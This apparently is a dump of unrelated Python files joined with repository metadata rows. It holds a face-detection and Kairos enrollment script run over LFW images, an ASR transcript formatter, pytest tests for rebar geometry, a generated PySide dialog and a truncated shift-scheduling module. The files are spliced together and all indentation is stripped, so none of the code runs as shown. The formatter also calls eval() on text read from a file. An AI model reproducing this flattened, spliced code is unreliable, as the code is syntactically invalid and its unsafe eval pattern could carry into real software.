with open(tmp_output, 'rb') as source_image:
xz_landmarks = face_data[0]['landmarks']
draw_landmark_boxes(tmp_output, xz_landmarks, face_filename)
except Exception as e:
msg = 'Exception in draw_landmark_boxes. Details: %s' % (str(e))
return (False, base_filename, num_faces, msg)
try:
# Save the JSON file
(result, errmsg) = save_as_json(response, json_filename)
if not result:
return (False, base_filename, num_faces, errmsg)
except Exception as e:
msg = 'Exception calling save_as_json. Details: %s' % (str(e))
return (False, base_filename, num_faces, msg)
# Iterate over the list of face_data
xz_face_data = []
for idx in xrange(0, num_faces):
z_face_data = {}
# Pull out headwearLikelihood value from json
headwear_likelihood = face_data[0]['headwearLikelihood']
z_face_data['headwear_likelihood'] = face_data[idx]['headwearLikelihood']
# Pull out eye locations
eye_data = get_eye_locations(face_data, idx)
if len(eye_data) == 2:
try:
d = compute_eye_distance(eye_data)
except Exception as e:
print('Exception calling compute_eye_distance: %s' % (str(e)))
return (False, base_filename, xz_face_data, '')
if d > 0.0:
z_face_data['eye_distance'] = d
else:
z_face_data['eye_distance'] = 0.0
else:
z_face_data['eye_distance'] = 0.0
# Pull out pan angles
try:
z_face_data['face_angles'] = get_face_angles(face_data, idx)
except Exception as e:
print('Exception calling get_face_angles: %s' % (str(e)))
return (False, base_filename, z_face_data, '')
# Add this dictionary to our list
xz_face_data.append(z_face_data)
return (True, base_filename, xz_face_data, '')
def compute_eye_distance(eye_data):
'''
eye_data is a list of two lists
eye_data[0]: [left_eye_x, left_eye_y, left_eye_z]
eye_data[1]: [right_eye_x, right_eye_y, right_eye_z]
'''
left_eye_x, left_eye_y, left_eye_z = eye_data[0]
right_eye_x, right_eye_y, right_eye_z = eye_data[1]
if left_eye_x and right_eye_x:
x = left_eye_x - right_eye_x
x = x * x
else:
return -1.0
if left_eye_y and right_eye_y:
y = left_eye_y - right_eye_y
y = y * y
else:
return -1.0
if left_eye_z and right_eye_z:
z = left_eye_z - right_eye_z
z = z * z
else:
return -1.0
d = np.sqrt(x + y + z)
return d
def select_faces_to_keep(filename, xz_face_data):
'''
xz_face_data is a list of dictionaries.
Each list item is a dictionary with the following key/values:
'eye_distance' : distance (float)
'headwear_likelihood' : likelihood enum (string)
'face_angles' : dictionary with the following keys: 'pan', 'roll', 'pitch'
Using the data we use some simple heuristics to determine which faces to keep.
Rule 1. In an ideal condition, the best face is the one that is relatively much larger than
the runner-up and has a pan angle close to 0.
If both faces are about the same size, then the best face is the one with the pan
angle closest to 0.
'''
x_faces_to_keep = []
x_distances = []
for z in xz_face_data:
d = z['eye_distance']
x_distances.append(d)
# Get the largest face (largest eye distance) and its index in the list
idx_of_largest_face = get_index_of_largest_eye_distance(x_distances)
largest_eye_distance = x_distances[idx_of_largest_face]
z_angles_of_largest_face = xz_face_data[idx_of_largest_face]['face_angles']
pan_angle_of_largest_face = abs(z_angles_of_largest_face['pan'])
# Null out the largest value so we can get runner-up
x_distances[idx_of_largest_face] = 0.0
# Get the runner-up face distance and its index in the list
idx_of_second_largest_eye_distance = get_index_of_largest_eye_distance(x_distances)
second_largest_eye_distance = x_distances[idx_of_second_largest_eye_distance]
z_angles_of_runner_up_face = xz_face_data[idx_of_second_largest_eye_distance]['face_angles']
pan_angle_of_runner_up = abs(z_angles_of_runner_up_face['pan'])
# Calculate the relative difference between these two distances
# This is a float between 0 and 1 in which a larger value indicates a greater relative difference
try:
relative_difference = calculate_relative_difference(largest_eye_distance, second_largest_eye_distance)
except Exception as e:
print('Exception thrown calling calculate_relative_difference. Details: %s' % (str(e)))
return []
rel_face_diff = face_difference(relative_difference)
face_dir_largest = face_direction(pan_angle_of_largest_face)
face_dir_runnerup = face_direction(pan_angle_of_runner_up)
# ---------------------------------------------------------------------------------------------------------------
# Rules for how we deal with other faces detected:
# R0: Large relative difference in face size and forward-facing ==> Only keep largest face
# R1: Medium relative difference in face size, but only largest face is forward-facing ==> Only keep largest face
# R2:
# R3
# Rule R0: If much larger and forward-facing, then only keep the largest face
if (rel_face_diff.name == 'LARGE' or rel_face_diff.name == 'EXTRA_LARGE') and \
face_dir_largest.d == 'FORWARD':
print('%s: Rule-0: relative difference: %s (%f), pan of largest face: %s (%f), pan of runner-up: %s (%f)' %
(filename, rel_face_diff.name, relative_difference, face_dir_largest.d, pan_angle_of_largest_face, face_dir_runnerup.d, pan_angle_of_runner_up))
# Rule R1: If larger, forward-facing face and runner-up is not forward-facing, then keep only largest face
elif rel_face_diff.name == 'MEDIUM' and \
face_dir_largest.d == 'FORWARD' and \
(face_dir_runnerup.d == 'ANGLED' or face_dir_runnerup.d == 'SIDE_VIEW'):
print('%s: Rule-0: relative difference: %s (%f), pan of largest face: %s (%f), pan of runner-up: %s (%f)' %
(filename, rel_face_diff.name, relative_difference, face_dir_largest.d, pan_angle_of_largest_face, face_dir_runnerup.d, pan_angle_of_runner_up))
# Rule R2: If approx same size faces, largest is forward-facing and runner-up is not forward-facing, keep the face that is forward-facing
elif (rel_face_diff.name == 'EXTRA_SMALL' or rel_face_diff.name == 'SMALL') and \
face_dir_largest.d == 'FORWARD' and \
(face_dir_runnerup.d == 'ANGLED' or face_dir_runnerup.d == 'SIDE_VIEW'):
print('%s: Rule-0: relative difference: %s (%f), pan of largest face: %s (%f), pan of runner-up: %s (%f)' %
(filename, rel_face_diff.name, relative_difference, face_dir_largest.d, pan_angle_of_largest_face, face_dir_runnerup.d, pan_angle_of_runner_up))
# Rule R3: If approx same size faces, largest is forward-facing and runner-up is forward-facing, keep both faces
elif (rel_face_diff.name == 'EXTRA_SMALL' or rel_face_diff.name == 'SMALL') and \
face_dir_largest.d == 'FORWARD' and face_dir_runnerup.d == 'FORWARD':
print('%s: Rule-0: relative difference: %s (%f), pan of largest face: %s (%f), pan of runner-up: %s (%f)' %
(filename, rel_face_diff.name, relative_difference, face_dir_largest.d, pan_angle_of_largest_face, face_dir_runnerup.d, pan_angle_of_runner_up))
# Rule R4: If approx same size faces and largest face is not forward-facing, runner-up is forward-facing ==> Keep only runner-up face
elif (rel_face_diff.name == 'EXTRA_SMALL' or rel_face_diff.name == 'SMALL') and \
(face_dir_largest.d == 'ANGLED' or face_dir_largest.d == 'SIDE_VIEW') and \
face_dir_runnerup.d == 'FORWARD':
print('%s: Rule-0: relative difference: %s (%f), pan of largest face: %s (%f), pan of runner-up: %s (%f)' %
(filename, rel_face_diff.name, relative_difference, face_dir_largest.d, pan_angle_of_largest_face, face_dir_runnerup.d, pan_angle_of_runner_up))
else:
print('%s: Rule-0: relative difference: %s (%f), pan of largest face: %s (%f), pan of runner-up: %s (%f)' %
(filename, rel_face_diff.name, relative_difference, face_dir_largest.d, pan_angle_of_largest_face, face_dir_runnerup.d, pan_angle_of_runner_up))
return x_faces_to_keep
def get_face_angles(face_data, face_idx):
'''
Using the json face_data returned from the Google Vision detection call,
get the pan, tilt and roll angles of the face and return in a dictionary,
with these values keyed on the angle name.
'''
face_angles = {}
try:
face_angles['pan'] = face_data[face_idx]['panAngle']
face_angles['tilt'] = face_data[face_idx]['tiltAngle']
face_angles['roll'] = face_data[face_idx]['rollAngle']
except Exception as e:
face_angles['pan'] = None
face_angles['tilt'] = None
face_angles['roll'] = None
return face_angles
def get_location_from_landmark_dict(z_lm):
'''
z_lm is the landmark dictionary and z['position'] is the dictionary
holding the coordinate values. It appears that sometimes the Google
service doesn't return a full dictionary.
'''
x = None
if 'x' in z_lm['position'].keys():
x = z_lm['position']['x']
y = None
if 'y' in z_lm['position'].keys():
y = z_lm['position']['y']
z = None
if 'z' in z_lm['position'].keys():
z = z_lm['position']['z']
return [x, y, z]
def get_eye_locations(face_data, face_idx):
'''
Using the json face_data returned from Google Vision detection call,
get the location of the left and right eye for the specified face index.
face_idx:0 is the 0th face detected.
face_idx:1 is the 1st face detected. ...
'''
eye_data = [[], []]
# face_data[idx]['landmarks'] is a list of dictionaries.
# We iterate over the list looking for the one that has the value of LEFT_EYE or
# RIGHT_EYE for the key 'type'.
for lm in face_data[face_idx]['landmarks']:
if lm['type'] == 'LEFT_EYE':
#left_eye_x = lm['position']['x']
#left_eye_y = lm['position']['y']
#left_eye_z = lm['position']['z']
#eye_data[0] = [left_eye_x, left_eye_y, left_eye_z]
[left_eye_x, left_eye_y, left_eye_z] = get_location_from_landmark_dict(lm)
continue
if lm['type'] == 'RIGHT_EYE':
#right_eye_x = lm['position']['x']
#right_eye_y = lm['position']['y']
#right_eye_z = lm['position']['z']
#eye_data[1] = [right_eye_x, right_eye_y, right_eye_z]
[right_eye_x, right_eye_y, right_eye_z] = get_location_from_landmark_dict(lm)
continue
return [[left_eye_x, left_eye_y, left_eye_z], [right_eye_x, right_eye_y, right_eye_z]]
def get_index_of_largest_eye_distance(x_distances):
'''
Returns the index in the x_distances list containing the maximum value.
'''
max_value = max(x_distances)
max_index = x_distances.index(max_value)
return max_index
def calculate_relative_difference(max_distance, runner_up_distance):
'''
Returns the relative difference between the max distance and the runner-up:
Rel_Diff = (max_distance - runner_up) / max_distance
'''
return (max_distance - runner_up_distance) / max_distance
class face_direction(object):
def __init__(self, pan_angle):
self.pan_angle = pan_angle
if pan_angle <= 30:
self._direction = en.cenum(0, 'FORWARD')
elif pan_angle > 30 and pan_angle <= 80:
self._direction = en.cenum(1, 'ANGLED')
else:
self._direction = en.cenum(2, 'SIDE_VIEW')
@property
def d(self):
return self._direction.name
class face_difference(object):
def __init__(self, rel_diff):
'''
rel_diff is the relative face size difference and is on (0, 1).
'''
self.rel_diff = rel_diff
if rel_diff <= 0.08:
self.category = en.cenum(0, 'EXTRA_SMALL')
elif rel_diff > 0.08 and rel_diff <= 0.12:
self.category = en.cenum(2, 'SMALL')
elif rel_diff > 0.12 and rel_diff <= 0.20:
self.category = en.cenum(3, 'MEDIUM')
elif rel_diff > 0.20 and rel_diff <= 0.60:
self.category = en.cenum(4, 'LARGE')
else:
self.category = en.cenum(5, 'EXTRA_LARGE')
@property
def name(self):
return self.category.name
def create_exclude_list(exclude_filename):
'''
Returns a list of filenames in the exclude_filename file.
These are the filenames that should be exluded from processing.
'''
with open(exclude_filename) as f:
x_names = [line.strip() for line in f]
return x_names
if __name__ == '__main__':
# Visual Studio script arguments:
# tst1\00AB500A-0006-0000-0000-000000000000.jpg --out 00AB500A-0006-0000-0000-000000000000_out.jpg --max-results 5
# tst1\demo-image.jpg --out tst1\dog_out.jpg --max-results 3
# tst1\00AB500A-0006-0000-0000-000000000000.jpg --face 00AB500A-0006-0000-0000-000000000000_face.jpg --land 00AB500A-0006-0000-0000-000000000000_land.jpg --max-results 5
# tst1\02ED2000-0006-0000-0000-000000000000.jpg --face 02ED2000-0006-0000-0000-000000000000_face.jpg --land 02ED2000-0006-0000-0000-000000000000_land.jpg --max-results 5
# fd = face_difference(0.30)
# print(fd.name)
print(sys.prefix)
print(sys.version)
print(sys.path)
src_root_dir = r'E:\_Ancestry\lfw\lfw_tmp_efghijk_orig'
out_dir = r'E:\_Ancestry\lfw\lfw_output'
out_suffix = '_face'
#exclude_list_filename = 'exclude1.txt'
#x_exclude = create_exclude_list(exclude_list_filename)
service = discovery.build('vision', 'v1', developerKey = API_KEY)
id = 0
x_files = get_list_of_matching_files(src_root_dir, ('*.jpg', '*.jpeg'))
#for fn in x_files:
# input_face_fni = fni.fname_info(fullname=fn)
# basename =
# output_face_fni = fni.fname_info(dirname=out_dir, basename=input_face_fni.basename, suffix=out_suffix)
# (dir, filename) = os.path.split(fn)
# (basename, ext) = os.path.splitext(filename)
for fn in x_files:
#if fn in x_exclude:
# msg = '%s | %s' % ('Exclude', fn)
# print(msg)
# continue
# Name of the output image file (with the out_suffix)
face_fn = basename + out_suffix + '.jpg'
full_output_face_fn = os.path.join(out_dir, face_fn)
# Name of the output JSON file (.json ext)
json_fn = basename + '.json'
full_output_json_fn = os.path.join(out_dir, json_fn)
try:
(result, base_filename, xz_face_data, errmsg) = detect_and_annotate(fn, full_output_face_fn, full_output_json_fn, service, 3)
except Exception as e:
print('Exception calling detect_and_annotate on: %s, Details: %s' % (filename, str(e)))
continue
if not result:
google_result = 'Failure'
else:
google_result = 'Success'
num_faces = len(xz_face_data)
if num_faces == 1:
try:
(response_code, z_attributes) = kairos_face.enroll_face(id, 'gallery13', file=fn)
kairos_result = 'Success'
except Exception as e:
msg = 'Exception in enroll_face for %s. Details: %s' % (basename, str(e))
face_idx = 0
gender = z_attributes['gender']['type']
age = z_attributes['age']
confidence = z_attributes['confidence']
headwear_likelihood = xz_face_data[0]['headwear_likelihood']
eye_distance = xz_face_data[0]['eye_distance']
pan_angle = xz_face_data[0]['face_angles']['pan']
#pan_angle = xz_face_angles[0]['pan']
#eye_distance = x_distances[0]
msg = '%s | %s | %s | %d | %s | %s | %s | %s | %s | %s | %s | %s' % (google_result, kairos_result, basename, face_idx, headwear_likelihood, gender, age, confidence, str(pan_angle), str(eye_distance), fn, errmsg)
print(msg)
id += 1
# More than 1 face slightly complicates things ...
else:
# We only care about the "extra" face if it meets certain conditions ...
try:
x_faces_to_keep = select_faces_to_keep(base_filename, xz_face_data)
except Exception as e:
print('Exception in select_faces_to_keep on %s. Details: %s' % (base_filename, str(e)))
continue
if False:
# Iterate over the faces we are going to keep...
for face_idx in xrange(0, num_faces):
try:
(response_code, z_attributes) = kairos_face.enroll_face(id, 'gallery13', file=fn)
kairos_result = 'Success'
except Exception as e:
msg = 'Exception in enroll_face for %s. Details: %s' % (basename, str(e))
gender = z_attributes['gender']['type']
age = z_attributes['age']
confidence = z_attributes['confidence']
msg = '%s | %s | %s | %d | %s | %s | %s | %s | %s | %s' % (google_result, kairos_result, basename, face_idx, headwear_likelihood, gender, age, confidence, fn, errmsg)
print(msg)
id += 1
# if num_faces == 1:
# try:
# (response_code, z_attributes) = kairos_face.enroll_face(id, 'gallery13', file=fn)
# kairos_result = 'Success'
# except Exception as e:
# msg = 'Exception in enroll_face for %s. Details: %s' % (basename, str(e))
# gender = z_attributes['gender']['type']
# age = z_attributes['age']
# confidence = z_attributes['confidence']
# else:
# gender = 'UNKNOWN_DUE_TO_MULTIPLE_FACES'
# age = 'UNKNOWN_DUE_TO_MULTIPLE_FACES'
# confidence = 'UNKNOWN_DUE_TO_MULTIPLE_FACES'
#msg = '%s | %s | %s | %d | %s | %s | %s | %s | %s | %s' % (google_result, kairos_result, basename, num_faces, headwear_likelihood, gender, age, confidence, fn, errmsg)
#print(msg)
#id += 1
#parser = argparse.ArgumentParser(description='Detects faces in the given image.')
#parser.add_argument('input_image', help='the image you\'d like to detect faces in.')
#parser.add_argument('--face', dest='face_output', default='face.jpg', help='the name of the face output file.')
#parser.add_argument('--land', dest='land_output', default='face.jpg', help='the name of the landmark output file.')
#parser.add_argument('--max-results', dest='max_results', default=4, help='the max results of face detection.')
#args = parser.parse_args()
#main(args.input_image, args.face_output, args.land_output, args.max_results)
print('Done!') | 439 | 670 | 68 |
7a3207755b382e0dbaeacf1643ede4b9c1101673 | 41 | py | Python | pii_crypt/__init__.py | jmilagroso/pii_crypt | ada156d6b85ada9c19d28cab8fc1b8d1c7e6a0a7 | [
"MIT"
] | null | null | null | pii_crypt/__init__.py | jmilagroso/pii_crypt | ada156d6b85ada9c19d28cab8fc1b8d1c7e6a0a7 | [
"MIT"
] | 18 | 2021-07-19T15:37:44.000Z | 2022-03-16T20:27:06.000Z | pii_crypt/__init__.py | jmilagroso/pii_crypt | ada156d6b85ada9c19d28cab8fc1b8d1c7e6a0a7 | [
"MIT"
] | 2 | 2021-08-13T00:29:04.000Z | 2022-03-30T00:41:34.000Z | from pii_crypt.pii_crypt import PIICrypt
| 20.5 | 40 | 0.878049 | from pii_crypt.pii_crypt import PIICrypt
| 0 | 0 | 0 |
a4bc2186bb3e8677879261e010f1cfbd360c8359 | 1,502 | py | Python | msoft-format.py | wallscope-research/incremental-asr-evaluation | d4e79b49b8b309888992ed96bd69d3d624098abf | [
"Apache-2.0"
] | null | null | null | msoft-format.py | wallscope-research/incremental-asr-evaluation | d4e79b49b8b309888992ed96bd69d3d624098abf | [
"Apache-2.0"
] | null | null | null | msoft-format.py | wallscope-research/incremental-asr-evaluation | d4e79b49b8b309888992ed96bd69d3d624098abf | [
"Apache-2.0"
] | null | null | null | from universal import process, clean_csv, add_trans_chunk
import sys
import re
# The infile is the system trancript.
infile = sys.argv[1]
# Using the system output name, the relevant universal format and full transcripts are gathered.
filename_prep = re.search(r"(?<=system-output\/)(.*?)(?=\.txt)", infile).group(0)
outfile = "./results/msoft/universal/msoft-" + filename_prep + ".csv"
trans_file = "./results/msoft/system-trans-text/msoft-" + filename_prep + "-trans.txt"
# setting initial utterance as jiwer can't handle empty strings.
# tsoft = the start of the file.
prev = "tsotf"
utt = ""
# Microsoft specific processing.
# This function extracts each new hypothesis with its time and processes it.
# Simultaneously, finalised hypotheses are stored for final WER calculations.
with open(infile, 'r') as f:
for line in f:
if line.startswith("RECOGNIZING"):
relevant_info = re.search(r"\{(.*?)\}", line).group(0)
dictionary = eval(relevant_info)
time = dictionary.get("Duration") + dictionary.get("Offset")
utt = dictionary.get("Text")
process(outfile, time, prev, utt)
prev = utt
elif line.startswith("JSON"):
prev = "tsotf"
transcript = re.search(r"(?<=DisplayText\":\")(.*?)(?=\")", line)
if transcript:
transcript = transcript.group(0)
add_trans_chunk(trans_file, transcript.lower())
# Universal output finalised.
clean_csv(outfile) | 39.526316 | 96 | 0.654461 | from universal import process, clean_csv, add_trans_chunk
import sys
import re
# The infile is the system trancript.
infile = sys.argv[1]
# Using the system output name, the relevant universal format and full transcripts are gathered.
filename_prep = re.search(r"(?<=system-output\/)(.*?)(?=\.txt)", infile).group(0)
outfile = "./results/msoft/universal/msoft-" + filename_prep + ".csv"
trans_file = "./results/msoft/system-trans-text/msoft-" + filename_prep + "-trans.txt"
# setting initial utterance as jiwer can't handle empty strings.
# tsoft = the start of the file.
prev = "tsotf"
utt = ""
# Microsoft specific processing.
# This function extracts each new hypothesis with its time and processes it.
# Simultaneously, finalised hypotheses are stored for final WER calculations.
with open(infile, 'r') as f:
for line in f:
if line.startswith("RECOGNIZING"):
relevant_info = re.search(r"\{(.*?)\}", line).group(0)
dictionary = eval(relevant_info)
time = dictionary.get("Duration") + dictionary.get("Offset")
utt = dictionary.get("Text")
process(outfile, time, prev, utt)
prev = utt
elif line.startswith("JSON"):
prev = "tsotf"
transcript = re.search(r"(?<=DisplayText\":\")(.*?)(?=\")", line)
if transcript:
transcript = transcript.group(0)
add_trans_chunk(trans_file, transcript.lower())
# Universal output finalised.
clean_csv(outfile) | 0 | 0 | 0 |
8ab199c3c2b997aeba40c8874ef806a8674f8b19 | 49 | py | Python | Flask-todolist-Sqlite3-master/venv/lib/python3.6/tokenize.py | IncredibleDraco/MyScholar | 272aafa33f7227d1bc0d937d046788cbabede453 | [
"Apache-2.0"
] | null | null | null | Flask-todolist-Sqlite3-master/venv/lib/python3.6/tokenize.py | IncredibleDraco/MyScholar | 272aafa33f7227d1bc0d937d046788cbabede453 | [
"Apache-2.0"
] | null | null | null | Flask-todolist-Sqlite3-master/venv/lib/python3.6/tokenize.py | IncredibleDraco/MyScholar | 272aafa33f7227d1bc0d937d046788cbabede453 | [
"Apache-2.0"
] | 1 | 2019-11-25T10:25:21.000Z | 2019-11-25T10:25:21.000Z | /home/sheldon/anaconda3/lib/python3.6/tokenize.py | 49 | 49 | 0.836735 | /home/sheldon/anaconda3/lib/python3.6/tokenize.py | 0 | 0 | 0 |
6e510c7e69d1c10e4a1f13a06328e422101135ca | 2,202 | py | Python | tests/test_rebar.py | SurajDadral/pyconcrete | 479cce3fbe6754243b1df7c555ed1ac66ab6b23e | [
"MIT"
] | 19 | 2019-03-27T18:34:38.000Z | 2021-10-29T23:44:04.000Z | tests/test_rebar.py | SurajDadral/pyconcrete | 479cce3fbe6754243b1df7c555ed1ac66ab6b23e | [
"MIT"
] | 1 | 2019-07-19T02:48:47.000Z | 2019-07-23T04:40:54.000Z | tests/test_rebar.py | SurajDadral/pyconcrete | 479cce3fbe6754243b1df7c555ed1ac66ab6b23e | [
"MIT"
] | 7 | 2019-05-20T05:49:37.000Z | 2021-12-27T23:41:23.000Z | import pytest
import copy
from pyconcrete import rebar
@pytest.fixture
@pytest.fixture
@pytest.fixture
# def test_real_length(r1, lr1, ur1):
# assert r1.real_length == 5
# assert lr1.real_length == 200
# assert ur1.real_length == 250
| 17.902439 | 71 | 0.565395 | import pytest
import copy
from pyconcrete import rebar
@pytest.fixture
def r1():
r = rebar.Rebar(
length=5,
diameter=20,
count=1,
insert=(0, 0))
return r
@pytest.fixture
def lr1():
r = rebar.LRebar(
length=5,
diameter=20,
count=2,
insert=(10, 20),
v_align='top',
h_align='left')
return r
@pytest.fixture
def ur1():
r = rebar.URebar(
length=200,
diameter=16,
count=4,
insert=(0, 0),
v_align='bot')
return r
def test_length(r1):
assert r1.length == 5
def test_diameter(r1):
assert r1.diameter == 20
def test_count(r1):
assert r1.count == 1
def test_insert(r1):
assert r1.insert == (0, 0)
def test_points(r1):
pts = [(0, 0), (5, 0)]
assert r1.points() == pts
def test_length_L(lr1):
assert lr1.length == 5
def test_diameter_l(lr1):
assert lr1.diameter == 20
def test_count_l(lr1):
assert lr1.count == 2
def test_insert_l(lr1):
assert lr1.insert == (10, 20)
def test_points_l(lr1):
pts = [(10, 14), (10, 20), (15, 20)]
assert lr1.points() == pts
def test_points_u(ur1):
pts = [(0, 6), (0, 0), (200, 0), (200, 6)]
assert ur1.points() == pts
def test_points_along(r1, lr1, ur1):
assert r1.points_along() == [(1.25, 0), (2.5, 0), (3.75, 0)]
assert lr1.points_along() == [(11.25, 20), (12.5, 20), (13.75, 20)]
assert ur1.points_along() == [(50, 0), (100, 0), (150, 0)]
def test_text(r1, lr1, ur1):
assert r1.text == '1~20'
assert lr1.text == '2~20'
assert ur1.text == '4~16'
def test_text_len(r1, ur1):
assert r1.text_len == 'L=5'
assert ur1.text_len == 'L=200'
r_scale = copy.deepcopy(r1)
r_scale.scale(75, 20)
assert r_scale.text_len == 'L=5'
def test_xy_level(r1, lr1, ur1):
assert r1.x1 == 0
assert r1.x2 == 5
assert r1.y == 0
assert ur1.x1 == 0
assert ur1.x2 == 200
assert ur1.y == 0
assert lr1.x1 == 10
assert lr1.x2 == 15
assert lr1.y == 20
# def test_real_length(r1, lr1, ur1):
# assert r1.real_length == 5
# assert lr1.real_length == 200
# assert ur1.real_length == 250
| 1,521 | 0 | 411 |
e3d7dce2a490922ec373ed82c8d9594a8acddd24 | 3,212 | py | Python | gui/qt_ui/EditGridQT.py | victorgabr/pps | dfe3fae64fd4dedde85204643f9c797c0373f96c | [
"BSD-3-Clause"
] | 7 | 2018-11-18T07:11:05.000Z | 2021-05-06T21:53:40.000Z | gui/qt_ui/EditGridQT.py | victorgabr/pps | dfe3fae64fd4dedde85204643f9c797c0373f96c | [
"BSD-3-Clause"
] | 9 | 2019-09-23T16:34:09.000Z | 2020-05-26T18:49:43.000Z | gui/qt_ui/EditGridQT.py | victorgabr/pps | dfe3fae64fd4dedde85204643f9c797c0373f96c | [
"BSD-3-Clause"
] | 2 | 2019-04-18T14:34:31.000Z | 2019-06-19T19:34:33.000Z | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'C:\Users\Victor\Dropbox\DFR\film2dose\qt_ui\edit_grid.ui'
#
# Created: Tue Sep 29 14:53:43 2015
# by: pyside-uic 0.2.15 running on PySide 1.2.2
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore, QtGui
| 48.666667 | 118 | 0.683064 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'C:\Users\Victor\Dropbox\DFR\film2dose\qt_ui\edit_grid.ui'
#
# Created: Tue Sep 29 14:53:43 2015
# by: pyside-uic 0.2.15 running on PySide 1.2.2
#
# WARNING! All changes made in this file will be lost!
from PySide import QtCore, QtGui
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(392, 125)
self.gridLayout = QtGui.QGridLayout(Dialog)
self.gridLayout.setObjectName("gridLayout")
self.ny_spin = QtGui.QSpinBox(Dialog)
self.ny_spin.setObjectName("ny_spin")
self.gridLayout.addWidget(self.ny_spin, 4, 0, 1, 1)
self.label = QtGui.QLabel(Dialog)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.label, 3, 0, 1, 1)
self.label_2 = QtGui.QLabel(Dialog)
self.label_2.setObjectName("label_2")
self.gridLayout.addWidget(self.label_2, 3, 1, 1, 1)
self.label_4 = QtGui.QLabel(Dialog)
self.label_4.setObjectName("label_4")
self.gridLayout.addWidget(self.label_4, 0, 1, 1, 1)
self.label_3 = QtGui.QLabel(Dialog)
self.label_3.setObjectName("label_3")
self.gridLayout.addWidget(self.label_3, 0, 0, 1, 1)
self.yd_spin = QtGui.QDoubleSpinBox(Dialog)
self.yd_spin.setProperty("value", 0.0)
self.yd_spin.setObjectName("yd_spin")
self.gridLayout.addWidget(self.yd_spin, 4, 1, 1, 1)
self.buttonBox = QtGui.QDialogButtonBox(Dialog)
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtGui.QDialogButtonBox.Cancel | QtGui.QDialogButtonBox.Ok)
self.buttonBox.setObjectName("buttonBox")
self.gridLayout.addWidget(self.buttonBox, 1, 3, 1, 1)
self.nx_spin = QtGui.QSpinBox(Dialog)
self.nx_spin.setProperty("value", 0)
self.nx_spin.setObjectName("nx_spin")
self.gridLayout.addWidget(self.nx_spin, 1, 0, 1, 1)
self.xd_spin = QtGui.QDoubleSpinBox(Dialog)
self.xd_spin.setSingleStep(1.0)
self.xd_spin.setProperty("value", 0.0)
self.xd_spin.setObjectName("xd_spin")
self.gridLayout.addWidget(self.xd_spin, 1, 1, 1, 1)
self.retranslateUi(Dialog)
QtCore.QObject.connect(self.buttonBox, QtCore.SIGNAL("accepted()"), Dialog.accept)
QtCore.QObject.connect(self.buttonBox, QtCore.SIGNAL("rejected()"), Dialog.reject)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
Dialog.setWindowTitle(QtGui.QApplication.translate("Dialog", "Dialog", None, QtGui.QApplication.UnicodeUTF8))
self.label.setText(QtGui.QApplication.translate("Dialog", "y points", None, QtGui.QApplication.UnicodeUTF8))
self.label_2.setText(
QtGui.QApplication.translate("Dialog", "y spacing (mm)", None, QtGui.QApplication.UnicodeUTF8))
self.label_4.setText(
QtGui.QApplication.translate("Dialog", "x spacing (mm)", None, QtGui.QApplication.UnicodeUTF8))
self.label_3.setText(QtGui.QApplication.translate("Dialog", "x points", None, QtGui.QApplication.UnicodeUTF8))
| 2,813 | 3 | 76 |
8971cf7bdc03885b5b25374ac539e3a70ab2dcbe | 32,516 | py | Python | pymwts/pymwtsio/tests/infiles/mwts_inputs_example/mwts_makedat.py | misken/pymwts | 8e301b5badbd65f5dec8894ccbe0f0859785d20c | [
"MIT"
] | null | null | null | pymwts/pymwtsio/tests/infiles/mwts_inputs_example/mwts_makedat.py | misken/pymwts | 8e301b5badbd65f5dec8894ccbe0f0859785d20c | [
"MIT"
] | null | null | null | pymwts/pymwtsio/tests/infiles/mwts_inputs_example/mwts_makedat.py | misken/pymwts | 8e301b5badbd65f5dec8894ccbe0f0859785d20c | [
"MIT"
] | null | null | null | #-------------------------------------------------------------------------------
# Name: mwts_makedat
# Purpose: mwts dat file creation
#
# Author: isken
#
# Created: 28/09/2011
# Copyright: (c) isken 2011
# Licence: <your licence>
#-------------------------------------------------------------------------------
#!/usr/bin/env python
import sys
import StringIO
import yaml
from numpy import *
import csv
import json
import itertools
"""
mwts_makedat is a module for reading input files for mwts problems
and creating an AMPL/GMPL data file.
It is a replacement for the ancient createssdat.c program that was
used to create AMPL/GMPL dat files for one week tour scheduling problems.
"""
def create_weekend_base(n_weeks):
"""
Generate basis for cartesion product of [0,1] lists based
on number of weeks in scheduling problem. Each list
element is one week. The tuple of binary values represent the
first and second day of the weekend for that week. A 1 means
the day is worked, a 0 means it is off.
Input:
n_weeks - number of weeks in scheduling horizon
Output:
Result is all the possible n_weeks weekends worked patterns.
Example: n_weeks = 4 --> 256 possible weekends worked patterns. This
exhaustive list can later be filtered to only include desirable patterns.
"""
basis_list = [[0,0],[1,0],[0,1],[1,1]]
mw_basis_list = []
for i in range(n_weeks):
mw_basis_list.append(basis_list)
# Use itertools to create the n_weeks cartesion product of the basis_list.
return list(itertools.product(*mw_basis_list))
def filterpatterns(pattern,ttnum,wkendtype,ttspec):
"""
Creates a sequence of binary values to be used for list filtering. This
function will contain the various rules used to filter out weekend days
worked patterns that we don't want to allow.
For now I'm hard coding in rules but need to develop an approach to
flexibly specifiying rules to apply to filter out undesirable weekends
worked patterns.
Inputs:
x - list of 2-tuples representing weekend days worked. Each list
element is one week. The tuple of binary values represent the
first and second day of the weekend for that week. A 1 means
the day is worked, a 0 means it is off.
type - 1 --> weekend consists of Saturday and Sunday
2 --> weekend consists of Friday and Saturday
max_days_worked - max # of weekend days worked over horizon
max_wkends_worked - max # of weekends in which >= 1 day worked
half_weekends_ok - True or False
max_consec_wkends - max consecutive weeks with >= 1 day worked
Examples:
(1) Type 1, work every other weekend
pattern = [(0,1),(1,0),(0,1),(1,0)], type = 1
(2) Type 1, work every other weekend
pattern = [(1,1),(0,0),(1,1),(0,0)], type = 2
Output: True --> keep pattern
False --> discard pattern
"""
n_weeks = len(pattern)
keep = True
tourtype = [t for t in ttspec['tourtypes'] if t['ttnum'] == ttnum]
# No more than max_days_worked over the scheduling horizon
max_days_worked = tourtype[0]['max_days_worked']
if not (sum(pattern) <= max_days_worked):
keep = False
# No consecutive weekends with one or more days worked
window = ntuples(pattern,2)
for pair in window:
if sum(pair) > 2:
keep = False
# No half-weekends
